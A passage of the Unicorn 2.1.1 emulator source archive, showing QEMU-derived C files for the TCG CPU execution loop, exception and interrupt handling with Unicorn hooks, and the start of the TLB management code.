DATA_SIZE > 1 */ #undef BSWAP #undef ABI_TYPE #undef DATA_TYPE #undef SDATA_TYPE #undef SUFFIX #undef DATA_SIZE #undef SHIFT �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/tcg/cpu-exec-common.c������������������������������������������������������0000664�0000000�0000000�00000003211�14675241067�0021137�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * emulator main execution loop * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "sysemu/cpus.h" #include "sysemu/tcg.h" #include "exec/exec-all.h" /* exit the current TB, but without causing any exception to be raised */ void cpu_loop_exit_noexc(CPUState *cpu) { cpu->exception_index = -1; cpu_loop_exit(cpu); } void cpu_reloading_memory_map(void) { } void cpu_loop_exit(CPUState *cpu) { /* Unlock JIT write protect if applicable. */ if (cpu->uc->nested_level == 1) { tb_exec_unlock(cpu->uc); } /* Undo the setting in cpu_tb_exec. */ cpu->can_do_io = 1; siglongjmp(cpu->uc->jmp_bufs[cpu->uc->nested_level - 1], 1); } void cpu_loop_exit_restore(CPUState *cpu, uintptr_t pc) { if (pc) { cpu_restore_state(cpu, pc, true); } cpu_loop_exit(cpu); } void cpu_loop_exit_atomic(CPUState *cpu, uintptr_t pc) { cpu->exception_index = EXCP_ATOMIC; cpu_loop_exit_restore(cpu, pc); } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/tcg/cpu-exec.c�������������������������������������������������������������0000664�0000000�0000000�00000047034�14675241067�0017664�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * emulator main execution loop * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu-common.h" #include "hw/core/cpu.h" #include "exec/exec-all.h" #include "tcg/tcg.h" #include "qemu/atomic.h" #include "qemu/timer.h" #include "exec/tb-hash.h" #include "exec/tb-lookup.h" #include "sysemu/cpus.h" #include "uc_priv.h" /* -icount align implementation. */ typedef struct SyncClocks { int64_t diff_clk; int64_t last_cpu_icount; int64_t realtime_clock; } SyncClocks; /* Allow the guest to have a max 3ms advance. * The difference between the 2 clocks could therefore * oscillate around 0. */ #define VM_CLOCK_ADVANCE 3000000 #define THRESHOLD_REDUCE 1.5 #define MAX_DELAY_PRINT_RATE 2000000000LL #define MAX_NB_PRINTS 100 /* Execute a TB, and fix up the CPU state afterwards if necessary */ static inline tcg_target_ulong cpu_tb_exec(CPUState *cpu, TranslationBlock *itb) { CPUArchState *env = cpu->env_ptr; uintptr_t ret; TranslationBlock *last_tb; int tb_exit; uint8_t *tb_ptr = itb->tc.ptr; UC_TRACE_START(UC_TRACE_TB_EXEC); tb_exec_lock(cpu->uc); ret = tcg_qemu_tb_exec(env, tb_ptr); if (cpu->uc->nested_level == 1) { // Only unlock (allow writing to JIT area) if we are the outmost uc_emu_start tb_exec_unlock(cpu->uc); } UC_TRACE_END(UC_TRACE_TB_EXEC, "[uc] exec tb 0x%" PRIx64 ": ", itb->pc); cpu->can_do_io = 1; last_tb = (TranslationBlock *)(ret & ~TB_EXIT_MASK); tb_exit = ret & TB_EXIT_MASK; // trace_exec_tb_exit(last_tb, tb_exit); if (tb_exit > TB_EXIT_IDX1) { /* We didn't start executing this TB (eg because the instruction * counter hit zero); we must restore the guest PC to the address * of the start of the TB. */ CPUClass *cc = CPU_GET_CLASS(cpu); if (!HOOK_EXISTS(env->uc, UC_HOOK_CODE)) { // We should sync pc for R/W error. switch (env->uc->invalid_error) { case UC_ERR_WRITE_PROT: case UC_ERR_READ_PROT: case UC_ERR_FETCH_PROT: case UC_ERR_WRITE_UNMAPPED: case UC_ERR_READ_UNMAPPED: case UC_ERR_FETCH_UNMAPPED: case UC_ERR_WRITE_UNALIGNED: case UC_ERR_READ_UNALIGNED: case UC_ERR_FETCH_UNALIGNED: break; default: // If we receive a quit request, users has sync-ed PC themselves. if (!cpu->uc->quit_request) { if (cc->synchronize_from_tb) { cc->synchronize_from_tb(cpu, last_tb); } else { assert(cc->set_pc); cc->set_pc(cpu, last_tb->pc); } } } } cpu->tcg_exit_req = 0; } return ret; } /* Execute the code without caching the generated code. An interpreter could be used if available. */ static void cpu_exec_nocache(CPUState *cpu, int max_cycles, TranslationBlock *orig_tb, bool ignore_icount) { TranslationBlock *tb; uint32_t cflags = curr_cflags() | CF_NOCACHE; if (ignore_icount) { cflags &= ~CF_USE_ICOUNT; } /* Should never happen. We only end up here when an existing TB is too long. */ cflags |= MIN(max_cycles, CF_COUNT_MASK); mmap_lock(); tb = tb_gen_code(cpu, orig_tb->pc, orig_tb->cs_base, orig_tb->flags, cflags); tb->orig_tb = orig_tb; mmap_unlock(); /* execute the generated code */ cpu_tb_exec(cpu, tb); mmap_lock(); tb_phys_invalidate(cpu->uc->tcg_ctx, tb, -1); mmap_unlock(); tcg_tb_remove(cpu->uc->tcg_ctx, tb); } struct tb_desc { target_ulong pc; target_ulong cs_base; CPUArchState *env; tb_page_addr_t phys_page1; uint32_t flags; uint32_t cf_mask; uint32_t trace_vcpu_dstate; }; static bool tb_lookup_cmp(struct uc_struct *uc, const void *p, const void *d) { const TranslationBlock *tb = p; const struct tb_desc *desc = d; if (tb->pc == desc->pc && tb->page_addr[0] == desc->phys_page1 && tb->cs_base == desc->cs_base && tb->flags == desc->flags && tb->trace_vcpu_dstate == desc->trace_vcpu_dstate && (tb_cflags(tb) & (CF_HASH_MASK | CF_INVALID)) == desc->cf_mask) { /* check next page if needed */ if (tb->page_addr[1] == -1) { return true; } else { tb_page_addr_t phys_page2; target_ulong virt_page2; virt_page2 = (desc->pc & TARGET_PAGE_MASK) + TARGET_PAGE_SIZE; phys_page2 = get_page_addr_code(desc->env, virt_page2); if (tb->page_addr[1] == phys_page2) { return true; } } } return false; } TranslationBlock *tb_htable_lookup(CPUState *cpu, target_ulong pc, target_ulong cs_base, uint32_t flags, uint32_t cf_mask) { struct uc_struct *uc = cpu->uc; tb_page_addr_t phys_pc; struct tb_desc desc; uint32_t h; desc.env = (CPUArchState *)cpu->env_ptr; desc.cs_base = cs_base; desc.flags = flags; desc.cf_mask = cf_mask; desc.trace_vcpu_dstate = *cpu->trace_dstate; desc.pc = pc; phys_pc = get_page_addr_code(desc.env, pc); if (phys_pc == -1) { return NULL; } desc.phys_page1 = phys_pc & TARGET_PAGE_MASK; h = tb_hash_func(phys_pc, pc, flags, cf_mask, *cpu->trace_dstate); return qht_lookup_custom(uc, &cpu->uc->tcg_ctx->tb_ctx.htable, &desc, h, tb_lookup_cmp); } void tb_set_jmp_target(TranslationBlock *tb, int n, uintptr_t addr) { if (TCG_TARGET_HAS_direct_jump) { uintptr_t offset = tb->jmp_target_arg[n]; uintptr_t tc_ptr = (uintptr_t)tb->tc.ptr; tb_target_set_jmp_target(tc_ptr, tc_ptr + offset, addr); } else { tb->jmp_target_arg[n] = addr; } } static inline void tb_add_jump(TranslationBlock *tb, int n, TranslationBlock *tb_next) { uintptr_t old; assert(n < ARRAY_SIZE(tb->jmp_list_next)); /* make sure the destination TB is valid */ if (tb_next->cflags & CF_INVALID) { goto out_unlock_next; } /* Atomically claim the jump destination slot only if it was NULL */ #ifdef _MSC_VER old = atomic_cmpxchg((long *)&tb->jmp_dest[n], (uintptr_t)NULL, (uintptr_t)tb_next); #else old = atomic_cmpxchg(&tb->jmp_dest[n], (uintptr_t)NULL, (uintptr_t)tb_next); #endif if (old) { goto out_unlock_next; } /* patch the native jump address */ tb_set_jmp_target(tb, n, (uintptr_t)tb_next->tc.ptr); /* add in TB jmp list */ tb->jmp_list_next[n] = tb_next->jmp_list_head; tb_next->jmp_list_head = (uintptr_t)tb | n; return; out_unlock_next: return; } static inline TranslationBlock *tb_find(CPUState *cpu, TranslationBlock *last_tb, int tb_exit, uint32_t cf_mask) { TranslationBlock *tb; target_ulong cs_base, pc; uint32_t flags; uc_tb cur_tb, prev_tb; uc_engine *uc = cpu->uc; struct list_item *cur; struct hook *hook; tb = tb_lookup__cpu_state(cpu, &pc, &cs_base, &flags, cf_mask); if (tb == NULL) { mmap_lock(); tb = tb_gen_code(cpu, pc, cs_base, flags, cf_mask); mmap_unlock(); /* We add the TB in the virtual pc hash table for the fast lookup */ cpu->tb_jmp_cache[tb_jmp_cache_hash_func(cpu->uc, pc)] = tb; if (uc->last_tb) { UC_TB_COPY(&cur_tb, tb); UC_TB_COPY(&prev_tb, uc->last_tb); for (cur = uc->hook[UC_HOOK_EDGE_GENERATED_IDX].head; cur != NULL && (hook = (struct hook *)cur->data); cur = cur->next) { if (hook->to_delete) { continue; } if (HOOK_BOUND_CHECK(hook, (uint64_t)tb->pc)) { JIT_CALLBACK_GUARD(((uc_hook_edge_gen_t)hook->callback)(uc, &cur_tb, &prev_tb, hook->user_data)); } } } } /* We don't take care of direct jumps when address mapping changes in * system emulation. So it's not safe to make a direct jump to a TB * spanning two pages because the mapping for the second page can change. */ if (tb->page_addr[1] != -1) { last_tb = NULL; } /* See if we can patch the calling TB. */ if (last_tb) { tb_add_jump(last_tb, tb_exit, tb); } return tb; } static inline bool cpu_handle_halt(CPUState *cpu) { if (cpu->halted) { #if 0 #if defined(TARGET_I386) if ((cpu->interrupt_request & CPU_INTERRUPT_POLL) && replay_interrupt()) { X86CPU *x86_cpu = X86_CPU(cpu); apic_poll_irq(x86_cpu->apic_state); cpu_reset_interrupt(cpu, CPU_INTERRUPT_POLL); } #endif #endif if (!cpu_has_work(cpu)) { return true; } cpu->halted = 0; } return false; } static inline void cpu_handle_debug_exception(CPUState *cpu) { CPUClass *cc = CPU_GET_CLASS(cpu); CPUWatchpoint *wp; if (!cpu->watchpoint_hit) { QTAILQ_FOREACH(wp, &cpu->watchpoints, entry) { wp->flags &= ~BP_WATCHPOINT_HIT; } } cc->debug_excp_handler(cpu); } static inline bool cpu_handle_exception(CPUState *cpu, int *ret) { bool catched = false; struct uc_struct *uc = cpu->uc; struct hook *hook; // printf(">> exception index = %u\n", cpu->exception_index); qq if (cpu->uc->stop_interrupt && cpu->uc->stop_interrupt(cpu->uc, cpu->exception_index)) { // Unicorn: call registered invalid instruction callbacks catched = false; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN_INVALID) { if (hook->to_delete) { continue; } JIT_CALLBACK_GUARD_VAR(catched, ((uc_cb_hookinsn_invalid_t)hook->callback)(uc, hook->user_data)); if (catched) { break; } } if (!catched) { uc->invalid_error = UC_ERR_INSN_INVALID; // we want to stop emulation *ret = EXCP_HLT; return true; } } if (cpu->exception_index < 0) { return false; } if (cpu->exception_index >= EXCP_INTERRUPT) { /* exit request from the cpu execution loop */ *ret = cpu->exception_index; if (*ret == EXCP_DEBUG) { cpu_handle_debug_exception(cpu); } cpu->exception_index = -1; return true; } else { #if defined(TARGET_X86_64) CPUArchState *env = cpu->env_ptr; if (env->exception_is_int) { // point EIP to the next instruction after INT env->eip = env->exception_next_eip; } #endif #if defined(TARGET_MIPS) || defined(TARGET_MIPS64) // Unicorn: Imported from https://github.com/unicorn-engine/unicorn/pull/1098 CPUMIPSState *env = &(MIPS_CPU(cpu)->env); env->active_tc.PC = uc->next_pc; #endif #if defined(TARGET_RISCV) CPURISCVState *env = &(RISCV_CPU(uc->cpu)->env); env->pc += 4; #endif #if defined(TARGET_PPC) CPUPPCState *env = &(POWERPC_CPU(uc->cpu)->env); env->nip += 4; #endif // Unicorn: call registered interrupt callbacks catched = false; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INTR) { if (hook->to_delete) { continue; } JIT_CALLBACK_GUARD(((uc_cb_hookintr_t)hook->callback)(uc, cpu->exception_index, hook->user_data)); catched = true; } // Unicorn: If un-catched interrupt, stop executions. if (!catched) { // printf("AAAAAAAAAAAA\n"); qq uc->invalid_error = UC_ERR_EXCEPTION; cpu->halted = 1; *ret = EXCP_HLT; return true; } cpu->exception_index = -1; } *ret = EXCP_INTERRUPT; return false; } static inline bool cpu_handle_interrupt(CPUState *cpu, TranslationBlock **last_tb) { CPUClass *cc = CPU_GET_CLASS(cpu); /* Clear the interrupt flag now since we're processing * cpu->interrupt_request and cpu->exit_request. * Ensure zeroing happens before reading cpu->exit_request or * cpu->interrupt_request (see also smp_wmb in cpu_exit()) */ cpu_neg(cpu)->icount_decr.u16.high = 0; if (unlikely(cpu->interrupt_request)) { int interrupt_request; interrupt_request = cpu->interrupt_request; if (unlikely(cpu->singlestep_enabled & SSTEP_NOIRQ)) { /* Mask out external interrupts for this step. */ interrupt_request &= ~CPU_INTERRUPT_SSTEP_MASK; } if (interrupt_request & CPU_INTERRUPT_DEBUG) { cpu->interrupt_request &= ~CPU_INTERRUPT_DEBUG; cpu->exception_index = EXCP_DEBUG; return true; } #if defined(TARGET_I386) else if (interrupt_request & CPU_INTERRUPT_INIT) { X86CPU *x86_cpu = X86_CPU(cpu); CPUArchState *env = &x86_cpu->env; //replay_interrupt(); cpu_svm_check_intercept_param(env, SVM_EXIT_INIT, 0, 0); do_cpu_init(x86_cpu); cpu->exception_index = EXCP_HALTED; return true; } #else else if (interrupt_request & CPU_INTERRUPT_RESET) { //replay_interrupt(); cpu_reset(cpu); return true; } #endif /* The target hook has 3 exit conditions: False when the interrupt isn't processed, True when it is, and we should restart on a new TB, and via longjmp via cpu_loop_exit. */ else { if (cc->cpu_exec_interrupt(cpu, interrupt_request)) { //replay_interrupt(); cpu->exception_index = -1; *last_tb = NULL; } /* The target hook may have updated the 'cpu->interrupt_request'; * reload the 'interrupt_request' value */ interrupt_request = cpu->interrupt_request; } if (interrupt_request & CPU_INTERRUPT_EXITTB) { cpu->interrupt_request &= ~CPU_INTERRUPT_EXITTB; /* ensure that no TB jump will be modified as the program flow was changed */ *last_tb = NULL; } } /* Finally, check if we need to exit to the main loop. */ if (unlikely(cpu->exit_request)) { cpu->exit_request = 0; if (cpu->exception_index == -1) { cpu->exception_index = EXCP_INTERRUPT; } return true; } return false; } static inline void cpu_loop_exec_tb(CPUState *cpu, TranslationBlock *tb, TranslationBlock **last_tb, int *tb_exit) { uintptr_t ret; int32_t insns_left; // trace_exec_tb(tb, tb->pc); ret = cpu_tb_exec(cpu, tb); cpu->uc->last_tb = tb; // Trace the last tb we executed. tb = (TranslationBlock *)(ret & ~TB_EXIT_MASK); *tb_exit = ret & TB_EXIT_MASK; if (*tb_exit != TB_EXIT_REQUESTED) { *last_tb = tb; return; } *last_tb = NULL; insns_left = cpu_neg(cpu)->icount_decr.u32; if (insns_left < 0) { /* Something asked us to stop executing chained TBs; just * continue round the main loop. Whatever requested the exit * will also have set something else (eg exit_request or * interrupt_request) which will be handled by * cpu_handle_interrupt. cpu_handle_interrupt will also * clear cpu->icount_decr.u16.high. */ return; } /* Instruction counter expired. */ /* Refill decrementer and continue execution. */ insns_left = MIN(0xffff, cpu->icount_budget); cpu_neg(cpu)->icount_decr.u16.low = insns_left; cpu->icount_extra = cpu->icount_budget - insns_left; if (!cpu->icount_extra) { /* Execute any remaining instructions, then let the main loop * handle the next event. */ if (insns_left > 0) { cpu_exec_nocache(cpu, insns_left, tb, false); } } } /* main execution loop */ int cpu_exec(struct uc_struct *uc, CPUState *cpu) { CPUClass *cc = CPU_GET_CLASS(cpu); int ret; // SyncClocks sc = { 0 }; if (cpu_handle_halt(cpu)) { return EXCP_HALTED; } // rcu_read_lock(); cc->cpu_exec_enter(cpu); /* Calculate difference between guest clock and host clock. * This delay includes the delay of the last cycle, so * what we have to do is sleep until it is 0. As for the * advance/delay we gain here, we try to fix it next time. */ // init_delay_params(&sc, cpu); // Unicorn: We would like to support nested uc_emu_start calls. /* prepare setjmp context for exception handling */ // if (sigsetjmp(cpu->jmp_env, 0) != 0) { if (sigsetjmp(uc->jmp_bufs[uc->nested_level - 1], 0) != 0) { #if defined(__clang__) || !QEMU_GNUC_PREREQ(4, 6) /* Some compilers wrongly smash all local variables after * siglongjmp. There were bug reports for gcc 4.5.0 and clang. * Reload essential local variables here for those compilers. * Newer versions of gcc would complain about this code (-Wclobbered). */ cc = CPU_GET_CLASS(cpu); #else /* buggy compiler */ /* Assert that the compiler does not smash local variables. */ // g_assert(cpu == current_cpu); g_assert(cc == CPU_GET_CLASS(cpu)); #endif /* buggy compiler */ assert_no_pages_locked(); } /* if an exception is pending, we execute it here */ while (!cpu_handle_exception(cpu, &ret)) { TranslationBlock *last_tb = NULL; int tb_exit = 0; while (!cpu_handle_interrupt(cpu, &last_tb)) { uint32_t cflags = cpu->cflags_next_tb; TranslationBlock *tb; /* When requested, use an exact setting for cflags for the next execution. This is used for icount, precise smc, and stop- after-access watchpoints. Since this request should never have CF_INVALID set, -1 is a convenient invalid value that does not require tcg headers for cpu_common_reset. */ if (cflags == -1) { cflags = curr_cflags(); } else { cpu->cflags_next_tb = -1; } tb = tb_find(cpu, last_tb, tb_exit, cflags); if (unlikely(cpu->exit_request)) { continue; } cpu_loop_exec_tb(cpu, tb, &last_tb, &tb_exit); /* Try to align the host and virtual clocks if the guest is in advance */ // align_clocks(&sc, cpu); } } // Unicorn: Clear any TCG exit flag that might have been left set by exit requests uc->cpu->tcg_exit_req = 0; cc->cpu_exec_exit(cpu); // rcu_read_unlock(); return ret; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/tcg/cputlb.c���������������������������������������������������������������0000664�0000000�0000000�00000250634�14675241067�0017446�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Common CPU TLB handling * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/memory.h" #include "exec/cpu_ldst.h" #include "exec/cputlb.h" #include "exec/memory-internal.h" #include "exec/ram_addr.h" #include "tcg/tcg.h" #include "exec/helper-proto.h" #include "qemu/atomic.h" #include "qemu/atomic128.h" #include "translate-all.h" #include "exec/cpu-common.h" #include "trace/mem.h" #include <uc_priv.h> #include <glib_compat.h> /* DEBUG defines, enable DEBUG_TLB_LOG to log to the CPU_LOG_MMU target */ /* #define DEBUG_TLB */ /* #define DEBUG_TLB_LOG */ #ifdef DEBUG_TLB # define DEBUG_TLB_GATE 1 # ifdef DEBUG_TLB_LOG # define DEBUG_TLB_LOG_GATE 1 # else # define DEBUG_TLB_LOG_GATE 0 # endif #else # define DEBUG_TLB_GATE 0 # define DEBUG_TLB_LOG_GATE 0 #endif #if 0 #define assert_cpu_is_self(cpu) do { \ if (DEBUG_TLB_GATE) { \ g_assert(!(cpu)->created || qemu_cpu_is_self(cpu)); \ } \ } while (0) #endif /* run_on_cpu_data.target_ptr should always be big enough for a * target_ulong even on 32 bit builds */ QEMU_BUILD_BUG_ON(sizeof(target_ulong) > sizeof(run_on_cpu_data)); /* We currently can't handle more than 16 bits in the MMUIDX bitmask. */ QEMU_BUILD_BUG_ON(NB_MMU_MODES > 16); #define ALL_MMUIDX_BITS ((1 << NB_MMU_MODES) - 1) static inline size_t tlb_n_entries(CPUTLBDescFast *fast) { return (fast->mask >> CPU_TLB_ENTRY_BITS) + 1; } static inline size_t sizeof_tlb(CPUTLBDescFast *fast) { return fast->mask + (1 << CPU_TLB_ENTRY_BITS); } static void tlb_window_reset(CPUTLBDesc *desc, int64_t ns, size_t max_entries) { desc->window_begin_ns = ns; desc->window_max_entries = max_entries; } /** * tlb_mmu_resize_locked() - perform TLB resize bookkeeping; resize if necessary * @desc: The CPUTLBDesc portion of the TLB * @fast: The CPUTLBDescFast portion of the same TLB * * Called with tlb_lock_held. * * We have two main constraints when resizing a TLB: (1) we only resize it * on a TLB flush (otherwise we'd have to take a perf hit by either rehashing * the array or unnecessarily flushing it), which means we do not control how * frequently the resizing can occur; (2) we don't have access to the guest's * future scheduling decisions, and therefore have to decide the magnitude of * the resize based on past observations. * * In general, a memory-hungry process can benefit greatly from an appropriately * sized TLB, since a guest TLB miss is very expensive. This doesn't mean that * we just have to make the TLB as large as possible; while an oversized TLB * results in minimal TLB miss rates, it also takes longer to be flushed * (flushes can be _very_ frequent), and the reduced locality can also hurt * performance. * * To achieve near-optimal performance for all kinds of workloads, we: * * 1. Aggressively increase the size of the TLB when the use rate of the * TLB being flushed is high, since it is likely that in the near future this * memory-hungry process will execute again, and its memory hungriness will * probably be similar. * * 2. Slowly reduce the size of the TLB as the use rate declines over a * reasonably large time window. The rationale is that if in such a time window * we have not observed a high TLB use rate, it is likely that we won't observe * it in the near future. In that case, once a time window expires we downsize * the TLB to match the maximum use rate observed in the window. * * 3. Try to keep the maximum use rate in a time window in the 30-70% range, * since in that range performance is likely near-optimal. Recall that the TLB * is direct mapped, so we want the use rate to be low (or at least not too * high), since otherwise we are likely to have a significant amount of * conflict misses. */ static void tlb_mmu_resize_locked(struct uc_struct *uc, CPUTLBDesc *desc, CPUTLBDescFast *fast, int64_t now) { size_t old_size = tlb_n_entries(fast); size_t rate; size_t new_size = old_size; int64_t window_len_ms = 100; int64_t window_len_ns = window_len_ms * 1000 * 1000; bool window_expired = now > desc->window_begin_ns + window_len_ns; if (desc->n_used_entries > desc->window_max_entries) { desc->window_max_entries = desc->n_used_entries; } rate = desc->window_max_entries * 100 / old_size; if (rate > 70) { new_size = MIN(old_size << 1, 1ULL << CPU_TLB_DYN_MAX_BITS); } else if (rate < 30 && window_expired) { size_t ceil = pow2ceil(desc->window_max_entries); size_t expected_rate = desc->window_max_entries * 100 / ceil; /* * Avoid undersizing when the max number of entries seen is just below * a pow2. For instance, if max_entries == 1025, the expected use rate * would be 1025/2048==50%. However, if max_entries == 1023, we'd get * 1023/1024==99.9% use rate, so we'd likely end up doubling the size * later. Thus, make sure that the expected use rate remains below 70%. * (and since we double the size, that means the lowest rate we'd * expect to get is 35%, which is still in the 30-70% range where * we consider that the size is appropriate.) */ if (expected_rate > 70) { ceil *= 2; } new_size = MAX(ceil, 1 << CPU_TLB_DYN_MIN_BITS); } if (new_size == old_size) { if (window_expired) { tlb_window_reset(desc, now, desc->n_used_entries); } return; } g_free(fast->table); g_free(desc->iotlb); tlb_window_reset(desc, now, 0); /* desc->n_used_entries is cleared by the caller */ fast->mask = (new_size - 1) << CPU_TLB_ENTRY_BITS; fast->table = g_try_new(CPUTLBEntry, new_size); desc->iotlb = g_try_new(CPUIOTLBEntry, new_size); if (desc->iotlb) { memset(desc->iotlb, 0, sizeof(CPUIOTLBEntry) * new_size); } /* * If the allocations fail, try smaller sizes. We just freed some * memory, so going back to half of new_size has a good chance of working. * Increased memory pressure elsewhere in the system might cause the * allocations to fail though, so we progressively reduce the allocation * size, aborting if we cannot even allocate the smallest TLB we support. */ while (fast->table == NULL || desc->iotlb == NULL) { if (new_size == (1 << CPU_TLB_DYN_MIN_BITS)) { fprintf(stderr, "%s: %s.\n", __func__, strerror(errno)); abort(); // FIXME: do not abort } new_size = MAX(new_size >> 1, 1 << CPU_TLB_DYN_MIN_BITS); fast->mask = (new_size - 1) << CPU_TLB_ENTRY_BITS; g_free(fast->table); g_free(desc->iotlb); fast->table = g_try_new(CPUTLBEntry, new_size); desc->iotlb = g_try_new(CPUIOTLBEntry, new_size); } } static void tlb_mmu_flush_locked(CPUTLBDesc *desc, CPUTLBDescFast *fast) { desc->n_used_entries = 0; desc->large_page_addr = -1; desc->large_page_mask = -1; desc->vindex = 0; memset(fast->table, -1, sizeof_tlb(fast)); memset(desc->vtable, -1, sizeof(desc->vtable)); } static void tlb_flush_one_mmuidx_locked(CPUArchState *env, int mmu_idx, int64_t now) { CPUTLBDesc *desc = &env_tlb(env)->d[mmu_idx]; CPUTLBDescFast *fast = &env_tlb(env)->f[mmu_idx]; tlb_mmu_resize_locked(env->uc, desc, fast, now); tlb_mmu_flush_locked(desc, fast); } static void tlb_mmu_init(CPUTLBDesc *desc, CPUTLBDescFast *fast, int64_t now) { size_t n_entries = 1 << CPU_TLB_DYN_DEFAULT_BITS; tlb_window_reset(desc, now, 0); desc->n_used_entries = 0; fast->mask = (n_entries - 1) << CPU_TLB_ENTRY_BITS; fast->table = g_new(CPUTLBEntry, n_entries); desc->iotlb = g_new(CPUIOTLBEntry, n_entries); tlb_mmu_flush_locked(desc, fast); } static inline void tlb_n_used_entries_inc(CPUArchState *env, uintptr_t mmu_idx) { env_tlb(env)->d[mmu_idx].n_used_entries++; } static inline void tlb_n_used_entries_dec(CPUArchState *env, uintptr_t mmu_idx) { env_tlb(env)->d[mmu_idx].n_used_entries--; } void tlb_init(CPUState *cpu) { CPUArchState *env = cpu->env_ptr; int64_t now = get_clock_realtime(); int i; /* All tlbs are initialized flushed. */ env_tlb(env)->c.dirty = 0; for (i = 0; i < NB_MMU_MODES; i++) { tlb_mmu_init(&env_tlb(env)->d[i], &env_tlb(env)->f[i], now); } } /* flush_all_helper: run fn across all cpus * * If the wait flag is set then the src cpu's helper will be queued as * "safe" work and the loop exited creating a synchronisation point * where all queued work will be finished before execution starts * again. */ static void flush_all_helper(CPUState *src, run_on_cpu_func fn, run_on_cpu_data d) { #if 0 CPUState *cpu; CPU_FOREACH(cpu) { if (cpu != src) { // async_run_on_cpu(cpu, fn, d); fn(cpu, d); } } #endif } static void tlb_flush_by_mmuidx_async_work(CPUState *cpu, run_on_cpu_data data) { CPUArchState *env = cpu->env_ptr; uint16_t asked = data.host_int; uint16_t all_dirty, work, to_clean; int64_t now = get_clock_realtime(); all_dirty = env_tlb(env)->c.dirty; to_clean = asked & all_dirty; all_dirty &= ~to_clean; env_tlb(env)->c.dirty = all_dirty; for (work = to_clean; work != 0; work &= work - 1) { int mmu_idx = ctz32(work); tlb_flush_one_mmuidx_locked(env, mmu_idx, now); } cpu_tb_jmp_cache_clear(cpu); if (to_clean == ALL_MMUIDX_BITS) { env_tlb(env)->c.full_flush_count = env_tlb(env)->c.full_flush_count + 1; } else { env_tlb(env)->c.part_flush_count = env_tlb(env)->c.part_flush_count + ctpop16(to_clean); if (to_clean != asked) { env_tlb(env)->c.elide_flush_count = env_tlb(env)->c.elide_flush_count + ctpop16(asked & ~to_clean); } } } void tlb_flush_by_mmuidx(CPUState *cpu, uint16_t idxmap) { //if (cpu->created && !qemu_cpu_is_self(cpu)) { // tlb_flush_by_mmuidx_async_work(cpu, RUN_ON_CPU_HOST_INT(idxmap)); //} else { tlb_flush_by_mmuidx_async_work(cpu, RUN_ON_CPU_HOST_INT(idxmap)); //} } void tlb_flush(CPUState *cpu) { tlb_flush_by_mmuidx(cpu, ALL_MMUIDX_BITS); } void tlb_flush_by_mmuidx_all_cpus(CPUState *src_cpu, uint16_t idxmap) { const run_on_cpu_func fn = tlb_flush_by_mmuidx_async_work; flush_all_helper(src_cpu, fn, RUN_ON_CPU_HOST_INT(idxmap)); fn(src_cpu, RUN_ON_CPU_HOST_INT(idxmap)); } void tlb_flush_all_cpus(CPUState *src_cpu) { tlb_flush_by_mmuidx_all_cpus(src_cpu, ALL_MMUIDX_BITS); } void tlb_flush_by_mmuidx_all_cpus_synced(CPUState *src_cpu, uint16_t idxmap) { const run_on_cpu_func fn = tlb_flush_by_mmuidx_async_work; flush_all_helper(src_cpu, fn, RUN_ON_CPU_HOST_INT(idxmap)); fn(src_cpu, RUN_ON_CPU_HOST_INT(idxmap)); } void tlb_flush_all_cpus_synced(CPUState *src_cpu) { tlb_flush_by_mmuidx_all_cpus_synced(src_cpu, ALL_MMUIDX_BITS); } static inline bool tlb_hit_page_anyprot(struct uc_struct *uc, CPUTLBEntry *tlb_entry, target_ulong page) { return tlb_hit_page(uc, tlb_entry->addr_read, page) || tlb_hit_page(uc, tlb_addr_write(tlb_entry), page) || tlb_hit_page(uc, tlb_entry->addr_code, page); } /** * tlb_entry_is_empty - return true if the entry is not in use * @te: pointer to CPUTLBEntry */ static inline bool tlb_entry_is_empty(const CPUTLBEntry *te) { return te->addr_read == -1 && te->addr_write == -1 && te->addr_code == -1; } /* Called with tlb_c.lock held */ static inline bool tlb_flush_entry_locked(struct uc_struct 